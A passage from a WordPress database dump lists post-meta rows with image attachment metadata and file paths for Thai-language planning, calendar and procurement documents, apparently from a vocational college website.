(5270, 1626, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:244;s:6:\"height\";i:311;s:4:\"file\";s:29:\"2018/03/7-3-2561-14-17-46.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"7-3-2561-14-17-46-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"7-3-2561-14-17-46-235x300.jpg\";s:5:\"width\";i:235;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"7-3-2561-14-17-46-235x300.jpg\";s:5:\"width\";i:235;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5271, 1631, '_wp_attached_file', '2018/03/7-3-2561-14-39-06.jpg'),
(5272, 1631, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:585;s:6:\"height\";i:157;s:4:\"file\";s:29:\"2018/03/7-3-2561-14-39-06.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"7-3-2561-14-39-06-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"7-3-2561-14-39-06-300x81.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:81;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"7-3-2561-14-39-06-400x107.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:107;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5273, 1632, '_wp_attached_file', '2018/03/7-3-2561-14-34-46.jpg'),
(5274, 1632, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:193;s:6:\"height\";i:246;s:4:\"file\";s:29:\"2018/03/7-3-2561-14-34-46.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"7-3-2561-14-34-46-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5275, 1633, '_wp_attached_file', '2018/03/7-3-2561-14-39-27.jpg'),
(5276, 1633, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:576;s:6:\"height\";i:157;s:4:\"file\";s:29:\"2018/03/7-3-2561-14-39-27.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"7-3-2561-14-39-27-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"7-3-2561-14-39-27-300x82.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:82;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"7-3-2561-14-39-27-400x109.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:109;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5279, 1635, '_wp_attached_file', '2018/03/7-3-2561-14-43-12.jpg');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(5280, 1635, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:583;s:6:\"height\";i:154;s:4:\"file\";s:29:\"2018/03/7-3-2561-14-43-12.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"7-3-2561-14-43-12-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"7-3-2561-14-43-12-300x79.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:79;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"7-3-2561-14-43-12-400x106.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:106;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5283, 1638, '_wp_attached_file', '2018/03/7-3-2561-14-49-01.jpg'),
(5284, 1638, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:194;s:6:\"height\";i:241;s:4:\"file\";s:29:\"2018/03/7-3-2561-14-49-01.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"7-3-2561-14-49-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5285, 1639, '_wp_attached_file', '2018/03/7-3-2561-14-49-18.jpg'),
(5286, 1639, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:580;s:6:\"height\";i:154;s:4:\"file\";s:29:\"2018/03/7-3-2561-14-49-18.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"7-3-2561-14-49-18-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"7-3-2561-14-49-18-300x80.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:80;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"7-3-2561-14-49-18-400x106.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:106;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5289, 1642, '_wp_attached_file', '2018/03/7-3-2561-14-57-37.jpg'),
(5290, 1642, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:202;s:6:\"height\";i:239;s:4:\"file\";s:29:\"2018/03/7-3-2561-14-57-37.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"7-3-2561-14-57-37-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5291, 1643, '_wp_attached_file', '2018/03/7-3-2561-14-53-30.jpg'),
(5292, 1643, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:580;s:6:\"height\";i:156;s:4:\"file\";s:29:\"2018/03/7-3-2561-14-53-30.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"7-3-2561-14-53-30-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"7-3-2561-14-53-30-300x81.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:81;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"7-3-2561-14-53-30-400x108.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:108;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5295, 1646, '_wp_attached_file', '2018/03/7-3-2561-15-01-21.jpg'),
(5296, 1646, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:195;s:6:\"height\";i:239;s:4:\"file\";s:29:\"2018/03/7-3-2561-15-01-21.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"7-3-2561-15-01-21-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5297, 1647, '_wp_attached_file', '2018/03/7-3-2561-15-01-34.jpg'),
(5298, 1647, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:583;s:6:\"height\";i:156;s:4:\"file\";s:29:\"2018/03/7-3-2561-15-01-34.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"7-3-2561-15-01-34-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"7-3-2561-15-01-34-300x80.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:80;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"7-3-2561-15-01-34-400x107.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:107;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5299, 1648, '_wp_attached_file', '2018/03/7-3-2561-15-05-03.jpg'),
(5300, 1648, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:506;s:6:\"height\";i:323;s:4:\"file\";s:29:\"2018/03/7-3-2561-15-05-03.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"7-3-2561-15-05-03-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"7-3-2561-15-05-03-300x192.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"7-3-2561-15-05-03-400x255.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:255;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5301, 1650, '_wp_attached_file', '2018/03/7-3-2561-15-21-54.jpg'),
(5302, 1650, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:586;s:6:\"height\";i:159;s:4:\"file\";s:29:\"2018/03/7-3-2561-15-21-54.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"7-3-2561-15-21-54-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"7-3-2561-15-21-54-300x81.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:81;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"7-3-2561-15-21-54-400x109.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:109;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5305, 1652, '_wp_attached_file', '2018/03/7-3-2561-15-22-50.jpg'),
(5306, 1652, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:191;s:6:\"height\";i:237;s:4:\"file\";s:29:\"2018/03/7-3-2561-15-22-50.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"7-3-2561-15-22-50-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5307, 1654, '_wp_attached_file', '2018/03/7-3-2561-15-24-55.jpg'),
(5308, 1654, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:246;s:6:\"height\";i:308;s:4:\"file\";s:29:\"2018/03/7-3-2561-15-24-55.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"7-3-2561-15-24-55-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"7-3-2561-15-24-55-240x300.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"7-3-2561-15-24-55-240x300.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5309, 1655, '_wp_attached_file', '2018/03/7-3-2561-15-25-12.jpg'),
(5310, 1655, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:306;s:6:\"height\";i:334;s:4:\"file\";s:29:\"2018/03/7-3-2561-15-25-12.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"7-3-2561-15-25-12-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"7-3-2561-15-25-12-275x300.jpg\";s:5:\"width\";i:275;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"7-3-2561-15-25-12-275x300.jpg\";s:5:\"width\";i:275;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5311, 1656, '_wp_attached_file', '2018/03/7-3-2561-15-25-57.jpg'),
(5312, 1656, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:236;s:6:\"height\";i:321;s:4:\"file\";s:29:\"2018/03/7-3-2561-15-25-57.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"7-3-2561-15-25-57-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"7-3-2561-15-25-57-221x300.jpg\";s:5:\"width\";i:221;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"7-3-2561-15-25-57-221x300.jpg\";s:5:\"width\";i:221;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5313, 1657, '_wp_attached_file', '2018/03/7-3-2561-15-26-35.jpg'),
(5314, 1657, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:227;s:6:\"height\";i:305;s:4:\"file\";s:29:\"2018/03/7-3-2561-15-26-35.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"7-3-2561-15-26-35-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"7-3-2561-15-26-35-223x300.jpg\";s:5:\"width\";i:223;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"7-3-2561-15-26-35-223x300.jpg\";s:5:\"width\";i:223;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5315, 1659, '_edit_lock', '1616488060:14'),
(5316, 1659, '_edit_last', '14'),
(5317, 1659, '_publicize_pending', '1'),
(5318, 1659, '_hide_featured', NULL),
(5319, 1664, '_wp_attached_file', '2018/03/แบบฟอร์ม-สผ.งาน-1-1.doc'),
(5320, 1665, '_wp_attached_file', '2018/03/แบบฟอร์ม-สผ.แผนก-1-1.doc'),
(5321, 1666, '_wp_attached_file', '2018/03/แบบฟอร์มโครงการ.xls'),
(5322, 1667, '_wp_attached_file', '2018/03/แบบฟอร์มรายงานผลการปฏิบัติงานตามแผนปฏิบัติการ.xls'),
(5323, 1668, '_wp_attached_file', '2018/03/ตัวบ่งชี้-สถานศึกษารางวัลพระราชทาน.pdf'),
(5324, 1669, '_wp_attached_file', '2018/03/ตัวบ่งชี้การประเมินคุณภาพภายนอก-สมศ_.pdf'),
(5325, 1670, '_wp_attached_file', '2018/03/ตัวบ่งชี้มาตรฐานอาชีวศึกษา-สอศ..pdf'),
(5326, 1671, '_wp_attached_file', '2018/03/แผนปฏิบัติราชการ-สำหรับสถานศึกษา2561.pdf'),
(5328, 1676, '_edit_lock', '1637808477:14'),
(5329, 1676, '_edit_last', '14'),
(5330, 1677, '_wp_attached_file', '2018/03/แผนปฏิบัติราชการ-สำหรับสถานศึกษา2561-1.pdf'),
(5331, 1678, '_wp_attached_file', '2018/03/แผนปฏิบัติการปีงบประมาณ2560.pdf'),
(5332, 1679, '_wp_attached_file', '2018/03/แผนปฏิบัติการปีงบประมาณ-2559.pdf'),
(5333, 1680, '_wp_attached_file', '2018/03/แผนปฏิบัติราชการ2558.pdf'),
(5334, 1681, '_wp_attached_file', '2018/03/แผนปฏิบัติการ-2557.pdf'),
(5335, 1682, '_wp_attached_file', '2018/03/ปีงบประมาณ-2555n.pdf'),
(5336, 1683, '_wp_attached_file', '2018/03/แผนปฏิบัติการ-2553.pdf'),
(5337, 1676, '_publicize_pending', '1'),
(5338, 1676, '_hide_featured', NULL),
(5339, 1688, '_edit_lock', '1544690021:3'),
(5340, 1688, '_edit_last', '3'),
(5341, 1689, '_wp_attached_file', '2018/03/แผนพัฒนาการจัดการศึกษาปี-2557-2561-.pdf'),
(5342, 1690, '_wp_attached_file', '2018/03/แผนพัฒนาสถานศึกษา-2551-2554.pdf'),
(5343, 1691, '_wp_attached_file', '2018/03/แผนพัฒนาสถานศึกษา-2555-2558.pdf'),
(5344, 1688, '_publicize_pending', '1'),
(5345, 1688, '_hide_featured', NULL),
(5346, 1695, '_wp_attached_file', '2018/03/แผนปฏิบัติราชการ-สำหรับสถานศึกษา2552.pdf'),
(5347, 1696, '_wp_attached_file', '2018/03/2554.pdf'),
(5348, 1697, '_wp_attached_file', '2018/03/แผนปฏิบัติการปีงบประมาณ-2556-.pdf'),
(5349, 1699, '_edit_lock', '1578365836:14'),
(5350, 1699, '_edit_last', '14'),
(5351, 1700, '_wp_attached_file', '2018/03/แผนโครงการกิจกรรม-2559-2560.pdf'),
(5352, 1701, '_wp_attached_file', '2018/03/แผนโครงการกิจกรรมชมรมวิชาชีพและองค์การ-2560-2561.pdf'),
(5353, 1702, '_wp_attached_file', '2018/03/แผนโครงการ-อชท-2558-2559.pdf'),
(5354, 1699, '_publicize_pending', '1'),
(5355, 1699, '_hide_featured', NULL),
(5356, 1706, '_edit_lock', '1637808363:14'),
(5357, 1706, '_edit_last', '14'),
(5358, 1706, '_publicize_pending', '1'),
(5359, 1706, '_hide_featured', NULL),
(5360, 1710, '_edit_lock', '1616488255:14'),
(5361, 1710, '_edit_last', '14'),
(5362, 1711, '_wp_attached_file', '2018/03/ปฏิทินปฏิบัติงาน2558.pdf'),
(5363, 1712, '_wp_attached_file', '2018/03/ปฏิทินปฏิบัติงานปีการศึกษา-2559.pdf'),
(5364, 1713, '_wp_attached_file', '2018/03/ปฏิทินปี-57.pdf'),
(5365, 1710, '_publicize_pending', '1'),
(5366, 1710, '_hide_featured', NULL),
(5367, 806, '_cg_img_link', 'https://goo.gl/RGU4eU'),
(5368, 806, '_cg_link_target', ''),
(5371, 1721, '_edit_lock', '1520675227:4'),
(5372, 1721, '_edit_last', '4'),
(5376, 1721, '_hide_featured', NULL),
(5377, 1721, '_wpas_done_all', '1'),
(5378, 1723, '_wp_attached_file', '2018/03/ประกาศรายชื่อวิชาที่เปิดสอนภาคฤดูร้อน-2560-เพิ่มเติม.pdf'),
(5383, 1721, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575725078;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5291;}i:1;a:1:{s:2:\"id\";i:4668;}i:2;a:1:{s:2:\"id\";i:4651;}}}}'),
(5384, 1727, '_edit_lock', '1520822559:3'),
(5385, 1727, '_edit_last', '3'),
(5386, 1728, '_wp_attached_file', '2018/03/ประกวดราคาซื้อด้วยวิธีประกวดราคาอิเล็กทรอนิกส์-e-bidding.pdf'),
(5387, 1727, '_hide_featured', NULL),
(5388, 1727, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575052108;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5589;}i:1;a:1:{s:2:\"id\";i:5680;}i:2;a:1:{s:2:\"id\";i:5830;}}}}'),
(5395, 1727, '_wpas_done_all', '1'),
(5396, 1731, '_edit_lock', '1520822776:3'),
(5397, 1731, '_edit_last', '3'),
(5398, 1732, '_wp_attached_file', '2018/03/รับสมัครคนงาน-2-อัตรา.pdf'),
(5402, 1731, '_hide_featured', NULL),
(5403, 1731, '_wpas_done_all', '1'),
